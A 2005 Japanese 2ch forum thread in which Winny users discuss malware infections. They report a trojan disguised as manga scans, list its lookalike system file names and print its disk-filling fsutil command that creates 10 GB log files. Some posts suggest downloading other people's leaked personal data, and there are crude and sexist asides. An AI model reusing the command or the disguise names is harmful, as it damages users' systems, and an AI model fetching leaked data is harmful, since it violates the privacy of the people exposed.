乳井留守    ホントだ・・・バスターでもニュイルスは防げなかったか
365[名無し]さん(bin+cue).rar:05/03/03 16:08:17 ID:la9PSfC30
ことえりは普通にニュイルスって変換したよ。
366[名無し]さん(bin+cue).rar:05/03/03 16:23:21 ID:zNPNKRf20
乳井留守
うわぁぁぁぁぁぁぁ!!ノートン先生ぇぇぇぇぇぇ!!
367[名無し]さん(bin+cue).rar:05/03/03 16:31:55 ID:j3y8kN080
ニュイルス
普通に変換された
368[名無し]さん(bin+cue).rar:05/03/03 17:00:47 ID:XvjO3gxI0
DLLファイル全滅か・・・。再インストールメンドクセー・・・。
369[名無し]さん(bin+cue).rar:05/03/03 18:04:56 ID:ZsPstnIL0
そもそも『乳井』ってなんだろう。
370[名無し]さん(bin+cue).rar:05/03/03 18:10:18 ID:Qz3w6V9G0
乳井さんて苗字あるよ
371[名無し]さん(bin+cue).rar:05/03/03 18:12:12 ID:2HefqAJG0
(・ω・ )居留守
372[名無し]さん(bin+cue).rar:05/03/03 18:28:17 ID:zNPNKRf20
(・ω・ )=にゅ ???
373[名無し]さん(bin+cue).rar:05/03/03 18:52:00 ID:dpFFhxyf0
作者さん、こいつらに煽られてますよ!
374[名無し]さん(bin+cue).rar:05/03/03 19:12:05 ID:1htwPSix0
にゅ居留守
375[名無し]さん(bin+cue).rar:05/03/03 19:14:29 ID:qmKGxbJB0
New居留守
376[名無し]さん(bin+cue).rar:05/03/03 19:32:53 ID:eGDmq1cI0
うにゅう?
377[名無し]さん(bin+cue).rar:05/03/03 21:33:36 ID:ZKvqqZdc0
エロ集めをしていたらファイル検索で

欄検眼段_C_なんとかかんとか
      ↑     ↑
  ドライブ名?  ファイルの名前

ってのが大量にあるが、これって新種のキンタマなの?
378[名無し]さん(bin+cue).rar:05/03/03 21:43:54 ID:UmKk2O1D0
60HEmEokEqのしか無い
379377:05/03/03 22:01:28 ID:/qu6LgbY0
>>378
あら、本当だ。ウィルス情報を問うたつもりが、俺が自分の性癖を暴露しただけなのか・・・・
380[名無し]さん(bin+cue).rar:05/03/03 22:06:54 ID:qOMQcoEh0
ある意味キンタマ
381[名無し]さん(bin+cue).rar:05/03/03 23:46:02 ID:uvQ0YlWI0
トレンドマイクロの海外サイトの無料、オンライスキャン及び駆除
サービスが終わってしまった。
いままでウイルス対策ソフトを入れてないオイラは
もうWinny使えなくなった。
一回でもかかればアウトだもんな〜。
382[名無し]さん(bin+cue).rar:05/03/04 00:20:49 ID:F4I2ohKr0
ノート買い換えたらマカフィーだったんだけど
ノートンも買って併用すべき?
383[名無し]さん(bin+cue).rar:05/03/04 02:21:58 ID:oYITpEFp0
ウイルスバスター2005検出NGです。

中身EXEなので怖い、情報求む。
HDDフォーマット系(MZnullpo)です。

[アプリ] シリアル集 - Les Clefs d'Or 2005年03月01日版.zip t5b1S93MTo 1,222,775 ef6aff13b0f13913f856d58ece9e4fe2


日本製見たい。
ファイルのオフセット、ゼロに設定する範囲の開始点
Microsoft Corporation
使用法 : fsutil usn readdata <ファイル名>
384[名無し]さん(bin+cue).rar:05/03/04 02:44:44 ID:7hYUlLXs0
>383
答え出てるんじゃないのか・・?
>ウイルスバスター2005検出NGです。
385[名無し]さん(bin+cue).rar:05/03/04 02:58:36 ID:bG6Uru330
>>384
感染した人が居たら詳しく聞きたい。里や耐え酒乱SEX
386[名無し]さん(bin+cue).rar:05/03/04 04:59:45 ID:PBrGtJDN0
なんかノートン先生が検出しないキンタマハッケソ('A`)
2004で最新パッチまで当ててるんだが何故だ。新亜種?
2005もインストしてないが持ってるけど新種だったら意味ないから当面様子見
387[名無し]さん(bin+cue).rar:05/03/04 06:10:49 ID:Wn90VxYQ0
system32に10GBのupdate001.logが作られる。
再起動すると消したはずのupdate001.logが元に戻り、
新たにupdate002.logが作られる… nortonは反応せず。
388[名無し]さん(bin+cue).rar:05/03/04 07:00:10 ID:X6coGJTF0
お、新種か?
389[名無し]さん(bin+cue).rar:05/03/04 08:11:08 ID:oJipfWuY0
>>387

下の325と同じだね。

ウィルス情報&質問 総合スレッド☆Part28
http://pc5.2ch.net/test/read.cgi/sec/1108718666/
390[名無し]さん(bin+cue).rar:05/03/04 09:20:33 ID:G+TobrdW0
新種というより、ただのトロイであって
先生が検知しないブツはnyに限らず各所に転がってる
nyを狙ったというのは、感染後nyに撒くとか、なんかその手のブツに
対して使うべきではないの?
391[名無し]さん(bin+cue).rar:05/03/04 09:22:59 ID:BiSBR8hN0
10Gもあったら俺の40GしかないHDDはパンクする
392[名無し]さん(bin+cue).rar:05/03/04 09:24:11 ID:Km+dDPRJ0
>>390
もともとはnyで流れてたのを誰かがうpろだにうpしたみたい。
393[名無し]さん(bin+cue).rar:05/03/04 10:05:24 ID:9LmFqIrL0
>>381
avast! 4
394[名無し]さん(bin+cue).rar:05/03/04 12:04:37 ID:66jfn8lg0
マイドキュメントのデータを消したり流したりするウイルスが
あるらしいけど、そのため、マイドキュメントを使用してない人は、
mp3,画像データ,その他、などのデータ類を、どう保存や管理して
るの?
395[名無し]さん(bin+cue).rar:05/03/04 12:21:46 ID:OrWsJQM70
>>394
好きなところに保存すればいいじゃん。
つか、お仕着せのマイドキュメントなんてこわくて使えない。
396[名無し]さん(bin+cue).rar:05/03/04 12:31:37 ID:1OPwZUh20
ソース管理者の人、聞きました?
マイドキュメントだけが危険だと信じてる人達がいる今がチャンスですよ
397[名無し]さん(bin+cue).rar:05/03/04 12:44:30 ID:PaREJ18A0
おk
398[名無し]さん(bin+cue).rar:05/03/04 15:17:12 ID:tDGizUj70
まあ、結局何処にあるか分からないからマイドキュ消すのが一番
399[名無し]さん(bin+cue).rar:05/03/04 15:35:33 ID:FxU/yhty0
アホばっか
400[名無し]さん(bin+cue).rar:05/03/04 17:22:07 ID:vCukcu5s0
入れなおすのが一番
401[名無し]さん(bin+cue).rar:05/03/04 17:47:35 ID:kOomtozj0
カモばっか
402[名無し]さん(bin+cue).rar:05/03/04 17:49:06 ID:t1AZxF5F0
ばっかって言う奴がばっか
403[名無し]さん(bin+cue).rar:05/03/04 18:01:19 ID:wydWMqEG0
>>386
ライブアップデートが当たっている限り、マルウェアで検出できないことはない
と公言していたとオモタ。
404[名無し]さん(bin+cue).rar:05/03/04 18:10:35 ID:rpscbWKy0
>>396

お前、馬鹿すぎ、なんでマイドキュメントだけのわけないだろ、
どう読んだらそうなるんだよw
405[名無し]さん(bin+cue).rar:05/03/04 18:27:43 ID:0aN0Mzf/0
なんでマイドキュメントだけのわけないだろ
406[名無し]さん(bin+cue).rar:05/03/04 18:45:22 ID:eQYoFVFS0
↑文章がおかしくね?
407[名無し]さん(bin+cue).rar:05/03/04 18:47:25 ID:gPzOS30P0
∧_∧
( ´・ω・) みなさん、お茶でも飲んでもちついて・・・・。
( つ旦O
と_)_) 旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦
408386:05/03/04 18:51:19 ID:PBrGtJDN0
>>403
ライブは完璧なはず。ウイルス定義は3/3日付け。
exeクリックで感染した。感染する前も後もスキャンで無反応。
一日様子見てみたがこれに関しては話題でないね
俺のはupdate001.logがどうのこうのじゃなくて、症状は普通にキンタマ。

しょうがないからレジストいじって駆除はしたが、気持ち悪いな・・・
先生がバグってるかはないと思うんだけどな
まあ俺だけっぽいから消えとくわノシ
409[名無し]さん(bin+cue).rar:05/03/04 18:56:52 ID:HgpWQWj/0
マイドキュメントが狙われるっていうから
始めて中身覗いたが意味不明な画像が入ってた
これがうわさのキンタマとかいう奴か? ガクガク(((;゚Д゚)))ブルブル

http://www.kitanet.ne.jp/~cas-per/cgi-bin/img-box/img20050304185503.jpg
410[名無し]さん(bin+cue).rar:05/03/04 19:16:07 ID:QDWnAlUh0
クソワラタ
411[名無し]さん(bin+cue).rar:05/03/04 19:23:17 ID:Zgltoq+n0
update 無限に増えるんですが
リカバリと復元以外の対処法教えてくだふぁい(´・д・`)
412[名無し]さん(bin+cue).rar:05/03/04 19:25:34 ID:gPzOS30P0
意味不明だと思うひと、挙手願いまつ。

413[名無し]さん(bin+cue).rar:05/03/04 19:29:56 ID:nyGxe7+Z0

414[名無し]さん(bin+cue).rar:05/03/04 19:30:47 ID:Zgltoq+n0
>>387
のこと
415[名無し]さん(bin+cue).rar:05/03/04 19:36:44 ID:1sq5hB0M0
>>414
>リカバリと復元以外の対処法教えてくだふぁい

ノートンが反応しないような新作を、一般人に対処法がわかると思うかい?
おとなしくリカバリ汁!
その前にシマンテックにウイルス検体提出しといてね
416[名無し]さん(bin+cue).rar:05/03/04 19:53:18 ID:Zgltoq+n0
うっはだるいな。エロ動画とか映画とか消せねえよ。。。
別に消し続けてたらめんどいけど害はないし
対処法が出るまで我慢するかな・・・

レジストリいじって直るなら誰かうpきぼんぬ
417[名無し]さん(bin+cue).rar:05/03/04 20:02:43 ID:BiSBR8hN0
>>416
新種なんだからレジのどこか分かる訳ねーべ
418[名無し]さん(bin+cue).rar:05/03/04 20:07:14 ID:gPzOS30P0
>>416
新種なんだから無害かどうか分かる訳ねーべ

後で泣く前にリカバリしておくほうが良いと思うんだがな。
419[名無し]さん(bin+cue).rar:05/03/04 20:16:59 ID:iXpW795X0
>>416
何をどうしたら、>>387の症状になったの?
420[名無し]さん(bin+cue).rar:05/03/04 20:21:04 ID:1sq5hB0M0
>>416
「うっはだるいな」なんて言ってるって事は、バックアップも取ってないトウシロウだなw

素人判断で弄って「これで大丈夫かな?」なんてハラハラするくらいならリカバリしたほうが精神的にもGood!
宣伝するわけじゃないが、下のようなToolを使えば復旧なんて30分以内に完了する
日頃から準備を怠らなければウイルスやシステムクラッシュなんてどうって事ない
「転んでも泣かない」のが2chのお約束ですよ

ttp://www.symantec.com/region/jp/products/ghost/
ttp://www1.ark-info-sys.co.jp/products/products_pc/backup/
421[名無し]さん(bin+cue).rar:05/03/04 20:34:30 ID:oJipfWuY0
【症状】WINDOWS¥system32内に15分おきに10Gのupdatexxx.logファイルを作成。
     画像うpなど、他にもあるかも?
【対象OS】Windows XP
【感染原因】winny及びアップローダー上の少年誌連載漫画のスキャン画像フォルダに
        偽装したexeファイルを実行することにより発症。
【その他】fsutil.exeが関係?
      今のところ、ウイルススキャンには反応せず。
      システムの復元でファイルの増殖は止まったとの報告あり。(ダメな人もいた。)
422[名無し]さん(bin+cue).rar:05/03/04 20:36:23 ID:1OPwZUh20
ハッシュとか何か手がかりになることはわからんのん?
423[名無し]さん(bin+cue).rar:05/03/04 20:44:06 ID:oJipfWuY0
偽)svc[2バイト文字]host.exe
本)svchost.exe

*重複してることと、実行した時間体にできたもの。

レジストリ
C:\WINDOWS\System32\svc[2バイト文字]host.exe
になってるから
C:\WINDOWS\System32\svchost.exe
に直せばいいんじゃないかな。
詳しくないからわからん。

HDDを圧迫するexeは容量10G以下のPCだと
なにもおこらないっぽい。
424[名無し]さん(bin+cue).rar:05/03/04 20:44:37 ID:oJipfWuY0
ctFmon.exe
ime\imejp\imejpmIg.exe
dlLhost.exe
svcHost.exe

…かもです
ふたつめはご丁寧にディレクトリ掘って格納するらしい
425[名無し]さん(bin+cue).rar:05/03/04 20:45:13 ID:oJipfWuY0
プログラムgomiplus2 を特定しますた…やっと
fsutil filecreate new %windir%\system32\updateXXX.log 10737418240
を実行するらしい もうちょっと調べてみるっす…
426[名無し]さん(bin+cue).rar:05/03/04 20:46:19 ID:oJipfWuY0
直らない。・・・
svchostも2バイト文字じゃないけど2個ある
他は異常なし。
プログラムgomiplus2 を特定しますた…やっと
fsutil filecreate new %windir%\system32\updateXXX.log 10737418240
は意味が分からん
復元は回避したい
システムの復元をするとマイドキュメントの中身が消えた。
別の手を考えようとあれこれ試したがsvchostやdllhostに触っただけで
また10Gのテキストが出来てる。
プログラムgomiplus2 は特定できなかった。
結局はシステムの復元をしたほうがいいと思う。
しかしマイドキュメントの中身が消えるのでバックアップで
ファイルの復元をしないといけない。
それでも全部は戻らないのであらかじめマイドキュメントの中をすべて
新しいフォルダにコピーしておき別の場所に保管しておくことを薦める。
復元で消えたドキュメントファイルをコピーするか移動させればいい。
怖いのは、あれこれ試したのがいけなかったか?時間をかけたのが悪かったか?
やればやるほどマイドキュメントが消えていくんだ。
自分の場合は最終的にマイドキュメント丸ごと全部と
その他のフリーソフト(少なくても3種類)まで消えてしまった。
どれもずっと前にダウンロードしたものなので1週間くらい復元でさかのぼっても
消えるはずのないソフトだったのに・・・・。
専用ブラウザが消えたので今はIEから書いているほどだ。
とりあえずシステムの復元によってsvchostやdllhostは消えたようなので
しばらくはこのまま様子見する。
まだ他にも影響が出ているかもしれない。
427[名無し]さん(bin+cue).rar:05/03/04 20:46:53 ID:oJipfWuY0
「fsutil」はどうも2000/XP系で標準のユーティリティコマンドっぽいな。

fsutil                    ユーティリティ指定
file                      コマンド
createnew                 「ファイルを新規作成する」オプション
%windir%\system32\updateXXX.log  作成するファイルのパスおよびファイル名を指定
10737418240               作成するファイルのサイズを指定

だから、%windir%変数下のsystem32フォルダに
10737418240バイトのサイズでupdateXXX.logファイルを作成しろってコマンドを実行してるわけだ。

ttp://www.atmarkit.co.jp/fwin2k/win2ktips/243largefile/largefile.html
428[名無し]さん(bin+cue).rar:05/03/04 20:54:53 ID:1sq5hB0M0
>どれもずっと前にダウンロードしたものなので1週間くらい復元でさかのぼっても
消えるはずのないソフトだったのに・・・・。


おまえ復元が分かってないだろ
429[名無し]さん(bin+cue).rar:05/03/04 20:58:45 ID:nm/drxsh0
PC初心者行った方がいい奴多すぎ
430[名無し]さん(bin+cue).rar:05/03/04 21:24:43 ID:Zjyr4tSD0
だからカモられる
431[名無し]さん(bin+cue).rar:05/03/04 21:53:07 ID:W4lnNJHQ0
多い?少ない? 3人に1人はインターネット「上級者」

・インターネットコム株式会社 と 株式会社インフォプラント による、利用歴
 3年以上のインターネットユーザーへ対する調査によると、自分は「インター
 ネット上級者」だと思うと答えたユーザーは合わせて33.4%だった。

 調査対象は全国20代〜50代の利用歴3年以上のインターネットユーザー
 300人。 年齢層は20代27.7%、30代40.0%、40代25.3%、50代7.0%。男女別
 構成比は男性42.3%、女性57.7%。
432[名無し]さん(bin+cue).rar:05/03/04 23:29:03 ID:ecIlj9RZ0
女でPC詳しい奴なんてリアルで見た事ないな…
433[名無し]さん(bin+cue).rar:05/03/04 23:35:05 ID:6RSXu5Zi0
>>431
自称上級者多すぎwww
つか上級者ってなんだよwww
434[名無し]さん(bin+cue).rar:05/03/04 23:39:52 ID:GY1FNP7e0
>175
SMTP用のポート25をnyに割り当てた相手の問題でこっちは関係ないってことか。
俺も2回ほど同じことあったからウイルス喰らったかと思った。
でもこっちの送信元ポートがnyに割り当てた番号じゃないのが気になるが。
435[名無し]さん(bin+cue).rar:05/03/04 23:55:45 ID:dm0J/3vn0
>>434
>でもこっちの送信元ポートがnyに割り当てた番号じゃないのが気になるが。

そりは総合質問スレのテンプレ22−FWの設定の仕方−に考えるヒントがあるべさ。
436416:05/03/05 01:13:33 ID:TfZcMJrU0
バックアップ所か、2日前買ったPCなんでね。
相当Winnyで落としまくったし、ブックマークも終えたし、ウイルスバスターも入れたのになぁ。
これからバックアップとるぞって矢先になったんで。
さっさと駆除できるようにうpデート汁!
437[名無し]さん(bin+cue).rar:05/03/05 01:24:25 ID:brfnJOJV0
>>432
俺のバイト先では音楽CD焼くなら誘電、アゾが、ジッターがどうのこうのやら
助言を教えてくれた女子がいました
438[名無し]さん(bin+cue).rar:05/03/05 01:30:12 ID:VyUb0ZnX0
>>436
まずは購入直後の状態のイメージをとるのが俺の基本。
だって万が一の時でも、リカバリするよりイメージ復元の方が早いもの。

まぁ2日ならまだダメージ浅いだろ。
授業料として甘受するのだな
439[名無し]さん(bin+cue).rar:05/03/05 01:49:18 ID:7x4WEqbm0
トレンドマイクロオンラインスキャンで、15のウィルス感染が報告。
WORM_ANTINNY.lが10個
WORM_ANTINNY.Aが3個
WORM_ANTINNY.GとWORM_ANTINNY.Bがともに1個
しかし感染ファイルが読めません(C\RESTORE\TEN....となり省略部が読めない)
このファイルの検索法と駆除法を教えてください。お願いします。
【使用OS】 ME
【WindowsUpdateしてるか】 はい
【使用AntiVirusソフト】 なし
【Winnyのバージョン】 2b7.1
【Winny歴、総DL量】 1年くらい 総DL 多分50GBくらい
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 ↓にまとめて
【症状、具体的に分かる限りすべて書く】 ↓にまとめて
【何をしたらそんなことになったのか】
過去に感染したことがありその時は対処したが、今回はexeファイルに細心の注意をはらっていたつもりだし実行した記憶もないのにいつの間にか感染していて焦ってます。
exe検索してもフォルダのやつは出てこないし(解凍時に出てきたことはあったが即ゴミ箱で捨ててます)、感染ファイルを持っているだけなのかそのウィルスが実行されてるのかとかもよく分からないんです。
正直言って今の自分のPCが危険な状態なのか、その手前なのかも分かっていない状態です。ごめんなさい。

440[名無し]さん(bin+cue).rar:05/03/05 01:51:43 ID:lITsMJ320
>>439
そういうのは
セキュリティ初心者質問スレッドpart52
http://pc5.2ch.net/test/read.cgi/sec/1108260790/
こっちで聞いてくれ
441[名無し]さん(bin+cue).rar:05/03/05 01:55:47 ID:7x4WEqbm0
>>440
失礼致しました。
442[名無し]さん(bin+cue).rar:05/03/05 01:56:24 ID:TIwcnx/p0
ANTINNYなんて自業自得なもん、端から相手にされないんじゃないの?
443[名無し]さん(bin+cue).rar:05/03/05 02:11:57 ID:HGlYjSmb0
>【使用AntiVirusソフト】 なし
>exeファイルに細心の注意をはらっていたつもりだし
>実行した記憶もないのに 

論外。ウィルス上等わが道をゆく主義なら,最後までオレ流を貫け。
第一、削除したってすぐに再感染するに違いないから無駄手間。
>>442 セキュ板でも誰も相手しませんよ。ny厨カエレで終いですよw
444[名無し]さん(bin+cue).rar:05/03/05 02:43:07 ID:eLTObI960
439です。
向こうでもおっしゃるとおりの反応をされました。
確かに自業自得ですね。。。
自分のけつは自分で拭くことにします。

というわけで、ドキドキの初OS再インストに向けてこれから下調べと下準備に取り掛かります!
それでは! がおーーー!きあいだー!
445416:05/03/05 02:45:22 ID:TfZcMJrU0
システム復元で何とか増殖はとまった。
このPC一日おきに記録してて助かったよ。
446[名無し]さん(bin+cue).rar:05/03/05 03:04:04 ID:F/ElHE1G0
で、問題ウィルスに対応するようになるのはいつ頃だ?

447[名無し]さん(bin+cue).rar:05/03/05 05:20:10 ID:xUL4TqDy0
>>446
作り手側のことも少しは考えてくれ。
そんなに早く対応されたら正直やってられんよッ!
448[名無し]さん(bin+cue).rar:05/03/05 05:58:31 ID:F/ElHE1G0
ウィルス対策ソフトを無料にしてくれたら文句は言わないがな
449[名無し]さん(bin+cue).rar:05/03/05 06:02:56 ID:/uKBhtO+0
ウィルスソフトの会社が自演でウィルス作ってるの?
450[名無し]さん(bin+cue).rar:05/03/05 06:11:15 ID:DCEdTQw50
>449
日々大量のウイルスが世界中で造られているというのに
余計な人件費を使う必要があるのか考えてみたのかよ
451[名無し]さん(bin+cue).rar:05/03/05 06:11:41 ID:xUL4TqDy0
>>449
ウソ
452[名無し]さん(bin+cue).rar:05/03/05 06:24:35 ID:5Y/TWqXg0
「うん」なのか「うそ」なのか・・・悶々と悩んでいるオレorz
453[名無し]さん(bin+cue).rar:05/03/05 06:27:44 ID:A8XrncAk0
つーか「ウィルスソフト」の会社なら作ってるだろーな
会社組織でやってるかどーかは知らんが

ウィルス対策ソフトの会社ならそんなヒマも金も無いだろ
まぁ其処の社員が個人的に何かやってる可能性は否定しきれんがな
454[名無し]さん(bin+cue).rar:05/03/05 11:16:50 ID:j4Ai05Id0
そーいや、サッサー作った高校生の少年は今頃どうしてんだろ
ヘッドハンティングされてんのかね
455[名無し]さん(bin+cue).rar:05/03/05 13:13:29 ID:vm8KCv7p0
捨てる菌ありゃ拾う菌あり
456[名無し]さん(bin+cue).rar:05/03/05 15:37:22 ID:NdtwGWE90
バスター使用ですがイメージファイル形式までスキャンしてくれないようです。
イメージファイルをきちんとスキャンできるセキュソフトでお勧めなのがあったらよかったら教えてください。
スレ違いですみません。。
457[名無し]さん(bin+cue).rar:05/03/05 15:41:40 ID:+c/oNOc10
>>456
すれ違いの上にマルチとは救いようがないな。

【cool】BitDefender Free Edition 4【free】
ttp://pc5.2ch.net/test/read.cgi/sec/1103213501/l50
458[名無し]さん(bin+cue).rar:05/03/05 16:24:52 ID:NdtwGWE90
やると思った。
459[名無し]さん(bin+cue).rar:05/03/05 16:34:35 ID:25pOBPmO0
>>449
JAS○ACだったりして??
460[名無し]さん(bin+cue).rar:05/03/05 16:36:01 ID:p+7cFliS0
ビックカメラで、アンチウイルスソフトを購入しようと入ったら
ノートンとトレンドマイクロがあって、そのノートンの店員に
超えかけられてノートンをすすめられ、今度はトレンドマイクロの店員
にも声かけられて、おすすめされて、もうわけわかんなくなった。
461[名無し]さん(bin+cue).rar:05/03/05 16:53:19 ID:zh1sYWTd0
ウイルスバスター2005を購入したけど、ウイルスを検出してくれません。
ソフトウエアの中にマイクロソフト製のウイルスがあるのですが?
462[名無し]さん(bin+cue).rar:05/03/05 17:03:54 ID:IhxBAWJU0
  そんな釣りで俺様がクマーー!!      ,,_
\                          r'o p。`、
  \                        l  ,.- 、ヾ       r' `ー- 、
   \                       l '-‐‐-' ,'       ' ,   .;;.`l
     \                     ',    j         ,i' ,,  '' l
      \                     〉    k       , '     ,ノ
        \                   ,'     ',      , '     ,'
         \                7      l     , '      ,'
           \              ,'      ,'    , '      ,'
            \   ,, ,.-‐--.,,__ ,'     , , ' 、  ,'         ,'
              \r''"´      ,  `   '"    `'、       ,'
              (´⌒qヽ    , '                   ,'
                ,、n_ノ    , '  _r-‐- 、             l'
               ' 、    _, ' ., r-' _,-‐q i             ,'
            ,.‐-、_,,ソー'´  , ; 、_γ  l       ,      ,'
          r‐'´g ri ::     ,'  '、  r_,  'l     :´ `ヾ   ,.'
          `、 r, i | :     ' ,   ` 、   j     '       , '
           t、o_ tj ::       ' ,  、`ー--,'.:        _,ノ
            `ー-‐'´ `ー----‐'"`ー、`____;'-、     ,-'
                               `゛"''''''"
463[名無し]さん(bin+cue).rar:05/03/05 17:50:04 ID:p+7cFliS0
ああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああ
464[名無し]さん(bin+cue).rar:05/03/05 18:44:28 ID:rUd1AP6B0
>>461
お前バスター君に給料払ってないだろ
465[名無し]さん(bin+cue).rar:05/03/05 18:58:58 ID:nM+DqIp20
>>464
ちゃんと毎日パターンUPしたり、検索エンジンもアップデートしたりしてます。
ん〜どうして僕のPCにはウイルスが居ないのでしょうか?

466[名無し]さん(bin+cue).rar:05/03/05 18:59:35 ID:MEqHOu8K0
シャイなんだよ。
467[名無し]さん(bin+cue).rar:05/03/05 19:23:57 ID:p+7cFliS0
ウブなんだよ。
468317:05/03/05 20:38:52 ID:JcIABgBMO
お願いします
469[名無し]さん(bin+cue).rar:05/03/05 20:51:26 ID:+c/oNOc10
>>468
再インスコ、以上。
470[名無し]さん(bin+cue).rar:05/03/05 21:47:03 ID:3sckGPg70
【使用OS】 WinXP home SP2
【WindowsUpdateしてるか】 している
【使用AntiVirusソフト】 ウィルスバスター2005
【AntiVirusをUpdateしてるか】 している
【ウイルススキャンの結果】 ウィルスなし
【オンラインスキャンしたなら結果】 ウィルスなし
【Winnyのバージョン】 V.6b66
【Winny歴、総DL量】 3ヶ月 20GBぐらい
【テンプレを読んだか】 よんだ
【テンプレにある対策を実行したか】 該当なし
【症状、具体的に分かる限りすべて書く】 スタートボタン→終了オプション→電源を切る→電源OFF→自動的に再起動
【何をしたらそんなことになったのか】 winny接続6時間
【これまでにとった措置】ウィルスチェック、スパイウェアチェック、スキャンディスク、チェックディスク、fixboot、fixmbr(回復コンソール)
再インスコしかないんでしょうか・・・・
471[名無し]さん(bin+cue).rar:05/03/05 21:50:22 ID:rUd1AP6B0
呪われてるんじゃねーの?
472[名無し]さん(bin+cue).rar:05/03/05 22:05:50 ID:Zo5mtmAx0
<470
アホみたいな話だが、終了オプションで「再起動」にチェックが入ってるとかは?
とりあえずアンチニーの仕業ではないと思う。
473[名無し]さん(bin+cue).rar:05/03/05 22:07:40 ID:IGsebwen0
>470
Hard側かもよ。変な周辺デバイスが動いてないか?
つか、何でもかんでもニュイルスのせいにするなよ。
474[名無し]さん(bin+cue).rar:05/03/05 22:19:51 ID:3sckGPg70
確実に終了選んでますし、
周辺デバイスは動いてないです。
今までは正常に使えていたんで・・・
475[名無し]さん(bin+cue).rar:05/03/05 22:32:10 ID:A8XrncAk0
余所のnyが接続に来たのを感知して起動してるんじゃねーの?
PC落としたらLANケーブルも抜いとけ
476470:05/03/05 22:37:11 ID:3sckGPg70
>>475
しばらくそれで対応してみます。
477[名無し]さん(bin+cue).rar:05/03/05 22:43:07 ID:wVTiLKeA0
BIOSのWakeupLanを切る
478[名無し]さん(bin+cue).rar:05/03/05 23:08:29 ID:+c/oNOc10
決め打ちでMagicPacket送信して、WakeupLANから起動させてる
としたら、たいしたもんだな。正直ガクブルもんだ。(((( ;゚Д゚)))
479ひみつの文字列さん:2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
480[名無し]さん(bin+cue).rar:05/03/05 23:51:38 ID:rUd1AP6B0
>>479
っで
481[名無し]さん(bin+cue).rar:05/03/06 00:20:33 ID:48CJP9Kl0
>>479の落ちてこないんだけど(´・ω・`)
482470:05/03/06 00:24:11 ID:Wg7jR/ie0
>>479
対処法とかはありますか?
483[名無し]さん(bin+cue).rar:05/03/06 01:12:03 ID:dfPtyZHl0
>>470
自作機?
ツレのPCも勝手に起ち上がる事があったんだけど
その時の原因はマザーボードとケースの短絡だった。
アースがきっちり取れてなかったのと、マザーの取り付けの
時に、間に絶縁シート(赤い丸いヤツ)挟んで無かったため。
電源やマザーのコンデンサとかが劣化したらなるのかな?
最後の方は、ケースの横面をコツンと叩くだけで電源が入って
それはそれで便利だったそうだ (w
484[名無し]さん(bin+cue).rar:05/03/06 01:15:04 ID:WZ25/qiB0
>>482
電源消しても、しばらく勝手に起動する現象の事かな?
それはメーカー製のPCによくあることなんだけど、
解決法はあるんだけど、もし質問の内容がそうじゃなかったら
悪いので・・・。
485[名無し]さん(bin+cue).rar:05/03/06 01:18:58 ID:lii3Qhxn0
板違いの話を延々とやられる方が迷惑だ
486481:05/03/06 01:26:34 ID:48CJP9Kl0
落ちてきた(・∀・)
487[名無し]さん(bin+cue).rar:05/03/06 01:35:23 ID:XOxwXhm70
>>486
既存ウイルスなら種類教えてくれ賜う。
未知ウイルスなら分離してパスロックかけてうpよろ。
488[名無し]さん(bin+cue).rar:05/03/06 01:44:25 ID:fddkjW910
ってかPandoraってニュイルスばっかじゃん。
ん?だからPandoraって言うのか…。妙に納得。
489[名無し]さん(bin+cue).rar:05/03/06 05:17:27 ID:xOdr+mG10
教えてください、将軍様
イメージファイル形式のアプリを落として解凍
ここまででノートン氏のスキャンでは問題ないようですが
イメージをマウントした時点で発動するウィルスってあるの?
490[名無し]さん(bin+cue).rar:05/03/06 05:51:41 ID:jTYxKjPk0
>>489
あんたからマウントとった時点で殴り出す人はいると思う
491[名無し]さん(bin+cue).rar:05/03/06 10:31:31 ID:bAj/IKye0
>>489
よゆう
492[名無し]さん(bin+cue).rar:05/03/06 10:47:15 ID:4YSs+y3t0
10Gニュイルスの対処法は?まだ?
493[名無し]さん(bin+cue).rar:05/03/06 10:52:05 ID:WZ25/qiB0
「ザクとはちがうのだよ! ザクとは・・」
494[名無し]さん(bin+cue).rar:05/03/06 12:01:17 ID:ud/qosr80
ガンダムだけであと100年は荒稼ぎできる
495[名無し]さん(bin+cue).rar:05/03/06 14:17:24 ID:lii3Qhxn0
>>479
アンチウイルスツールが検出するウィルス
ニュイルス(新型)じゃない

ただ先生やAVGはW32.Pinfi(Win32/Parite.A)って検出するんだけど、
実態はぬるぽテキスト型(たぶん既出)なんだよね

これは誤検出なのか、広義の亜種なのかよくわかんね
少なくとも>>337のリンクで書かれてる対処方法じゃダメなのは確か
496[名無し]さん(bin+cue).rar:05/03/06 15:08:29 ID:EwU2I3Do0
キンタマで自分の個人情報流れてるか知る方法ないのですか?
マルチで申し訳ない。
497[名無し]さん(bin+cue).rar:05/03/06 15:18:15 ID:LwxnawE20
検索する
498[名無し]さん(bin+cue).rar:05/03/06 15:30:38 ID:XOxwXhm70
ヒットしたら落としてみる
499[名無し]さん(bin+cue).rar:05/03/06 17:05:43 ID:FI9zmLOa0
 [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh とかいうの落として見たいんだけど
これ自体にウイルスって入ってるのかな?
500[名無し]さん(bin+cue).rar:05/03/06 17:07:10 ID:pHFz/daA0
心配なら.lzhはやめておいた方がいい
501[名無し]さん(bin+cue).rar:05/03/06 17:11:59 ID:lii3Qhxn0
>>498
>>479は違法なので捏造警告指定してあったが再キャッシュ化しといた
終わったら言ってくれ
502[名無し]さん(bin+cue).rar:05/03/06 17:18:56 ID:FI9zmLOa0
>>500
何故ですか?
503[名無し]さん(bin+cue).rar:05/03/06 17:21:57 ID:oyvUbKut0
>>502
何故だろう
504[名無し]さん(bin+cue).rar:05/03/06 17:26:34 ID:99cUFvEkO
何故ならば
505[名無し]さん(bin+cue).rar:05/03/06 17:43:23 ID:nhfqKJw00
 ____   r っ    ________   _ __,、            r っ             r っ
 | .__ | __| |__  |____  ,____|  ,! / | l´      く`ヽ ___| |__   r‐――┘└‐――┐
 | | | | | __  __ |  r┐ ___| |___ r┐  / / | |  /\   ヽ冫L_  _  |   | ┌─────┐ |
